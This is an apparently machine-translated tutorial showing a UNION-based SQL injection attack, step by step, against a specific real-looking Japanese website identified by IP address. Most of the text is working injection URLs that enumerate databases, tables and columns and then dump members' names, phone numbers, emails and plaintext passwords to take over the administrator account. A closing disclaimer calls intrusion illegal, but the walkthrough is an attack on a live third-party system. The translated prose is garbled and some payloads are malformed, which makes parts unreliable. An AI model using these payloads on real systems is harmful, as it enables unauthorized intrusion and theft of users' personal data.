3-6sql injection website instance step 5: break through the background to obtain web administrator permissions

When we get the top spot , And the upper point is fully tested , The goal of the test is to get confirmed information , It can display the database information we want , All table information , All field information , even to the extent that , We can get the permission of the background administrator , So this article , Let's solve this problem

Use the upper point to explode the storehouse , Get the permission of the background administrator

1. Get all the database names of the current connection

We are still on this upper point , To test , We need to query all databases , We are right. information_schema Under the schemata surface , Others we leave blank for the time being , Leave it blank. Let's use single quotation marks here ,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(schema_name,char(10),'',char(10),'',char(10),'',char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10--
&mid=1

So let's do that

All database names of the server where the current connection is located , All out , We found that , We have achieved 1-10 individual , Actually, there are only six , such , We have all the data names

Let's summarize

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(schema_name,char(10),'',char(10),'',char(10),'',char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10--
&mid=1

We go through concat、schema_name obtain , Back , We checked schemata This table , After getting all the database names , We want to get all the tables in the current database

2. Get all the table names of the current database

First, get the database where the current table is located ,table_schema, This is table_name, The next one is table_rows, The number of rows the table has , Next is the notes of the table ,table_comment, If any , We are still through tables Search for ,where table_schema=database,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() --
&mid=1

Let's do it first , Look at the results

We found it all out , Yes 10 page , That is, there are many tables in the current database , This brings some difficulties to our analysis , Because we want to get the password of the backstage Administrator , So many tables , Which table is it kept in , So much information , Obviously for us to find , There is some difficulty

Let's first summarize

Get all tables of the current library , The library where the table is located , The number of rows of the table and the functional notes of the table

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,10--

next step , Just hope to get web The table where the background administrator password may be located

3. get web The table where the background administrator password may be located

We saw too many watches just now , Let's guess , Because the table is often a user table , Users may contain user,member This kind of field , Let's guess ,and Inside table_name like, Let's see if we support like Inquire about , Let's take a look first user, Is there a table like this , Let's analyze it

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name like '%user%'--
&mid=1

We see that there are indeed , We see MAG_user, Maybe this is the administrator's table , Let's copy it , Save it

We'll see member,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name like '%member%'--
&mid=1

We see that there is menber surface , Of course , There are other similar , But the most likely one is this

Get to this point , We have come to the conclusion that web Possible tables for background Administrators , There are two , One is member surface , One is just where MAG_user surface

good , Let's summarize now

Get all tables of the current library , Table all libraries , The number of rows of the table and the functional notes of the table

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name>=‘a’ and table_name<‘b’ limit 1,10--

The second part , Get the table that the administrator may be in , Then through the where Inquire about , Or range query , To find out what the real table is , next step , Let's analyze the two tables , Or in the next table , Is it an administrator , Or other users , Save the table where the user name and password are located , So the next step , We need to get all the fields of the user table

4. Get all the fields of the user table

The table you are looking up is called columns,table_schema Is the current database , What about the table name , We are equal to member, The one in front is called column_name, Field name , Is there a comment on the field , We also find it out , There may be , Annotations may be helpful for us , Because it explains what the function of the field is , So let's do that ,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member'--
&mid=1

We found that this is member All fields of the table , We see PWD All out

We see that there are many fields here , But it is very helpful for us , Because we found that we had all the fields , And the function and meaning of the field , Basically , We are quite clear , for instance , This is the mobile number , This is the mailbox , This is the password

Next , Let's see mag_user surface , So let's do that

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='mag_user'--
&mid=1

We will find that this is the administrator's ID、 Members' names 、 Name of the collaborator 、 E-mail 、 Login tag , Analyze all the fields of the two tables , We may confirm the final background administrator user name and password , Still menber Inside the watch , So the next step , We will get the user name and password of the background administrator

Let's summarize

Get all fields of the user name , The number of field rows and the functional comments of the field

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member' limit 1,10--

All fields of the user table , We decided to table_schema Equals the current database and table_name be equal to member, This is the final backstage administrator we confirmed , His username and password are member In the table

5. get web The user name of the background administrator 、 password 、 Mailbox and other sensitive information

This step , That's what we just typed member surface , We put him in , We get this message , Let's see ,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name='member'--
&mid=1

then , The query we implemented , From member Query in the table , Let's modify this query , We directly from member surface ,member Let's first show 100 Bar , It is shown that member_name,mobile,email,pwd, Let's do it first , See if it can find out ,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(member_name,char(10),mobile,char(10),email,char(10),pwd)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from member 1,100--
&mid=1

We see it is empty , The emptiness enlightens us , Because we can see that the dictionary table can be queried , And we are connected to the current database , This means that you have certain permissions , The reason , It doesn't show , We may need to adequately handle the fields , If member_name Display blank , How did the program deal with him , therefore , We need to deal with this empty predictability , If ifnull,null It means , If member_name Empty words , Just show me , Is shown as hxf_name, Next , One by one , This is the time , Let's see ,

https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(ifnull('member_name','hxf_name'),char(10),ifnull('mobile','hxf_mob',char(10),ifnull('email','hxf_em'),char(10),ifnull('pwd','hxf_pwd')),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from 'zakkanet','member' limit 1,100--
&mid=1

We see that these have come out , We see this information is very sensitive , If you don't have a cell phone number , Namely hxf_mob, Of course , He may not show it here , We see that the password is plaintext , This is for us , Or for websites , It's quite important , If the password is saved in clear text , Yes SQL The attacker said , It helps a lot , Because he got the plaintext password directly , Then use the plaintext password , You can log in to the background , To this step , We get all the usernames , Including mobile phone 、 mailbox 、 password , So the administrator is also in this , Of course , Administrators include ,admin and member surface , Administrator he may be admin, Or other super management , I won't show it here , Because users and where Background administrator , The user name and password are all here

adopt where Conditions , Find out member_name, whether like admin, Find out , such , We can finally get the password of the Administrator 、 jurisdiction

Let's summarize

union select 1,2,3,4,5,6,7,8,9,concat(ifnull(`MEMBER_NAME`,'null'),char(10),ifnull(`MOBILE`,'null'),char(10),ifnull(`E_MAIL`,'null'),char(10),ifnull(`PWD`,'null'),char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from `ZAKKANET`.`MEMBER` limit 1,10--

We finally got web The user name of the background administrator 、 password 、 Mailbox and other sensitive information , All this has been achieved , Fortunately, the password of this website is plaintext , After getting the plaintext password , We can log in directly in the background , At this point , We can crack this website , That is, the successful invasion of this website , When we log in through the background , We have successfully controlled this website

next step 1: Suppose this website , What we get is not a clear text password , Then we need to put the password md5 Go to the Internet md5 The plaintext password is obtained by comparing the database

So actually , We don't need this step

next step 2: direct Web Background administrator login , Then we will get the permission of the administrator , about SQL For the infusor , They can do what they want

But our goal is mainly for safety , This step , This article does not demonstrate

Warning ： Any successful intrusion into the background is illegal , Not for the purpose of this tutorial , The goal of this tutorial is to prevent intrusion , You should bear all the consequences of invading the background of the website

6. Summary

1. Get the names of all databases currently connected , All table names

2. Get the sensitive information table and field where the current database table is located

3. Access includes web All user names of the background administrator , password , mailbox 、 Mobile phones and other sensitive information .

Understand through the process , We already know ,mysql Injected advanced hackers , To get the permission of the background , It's not hard , Of course , For our explicit attack , It is obviously easier , For blind injection attacks , Relatively difficult , But whether it is explicit or blind , His principles are invariable

however , occasionally , For us , Look for the injection point , Or attack the injection point , Relatively speaking, it is relatively difficult , Our technology also has certain limitations , This is the time , Tools are needed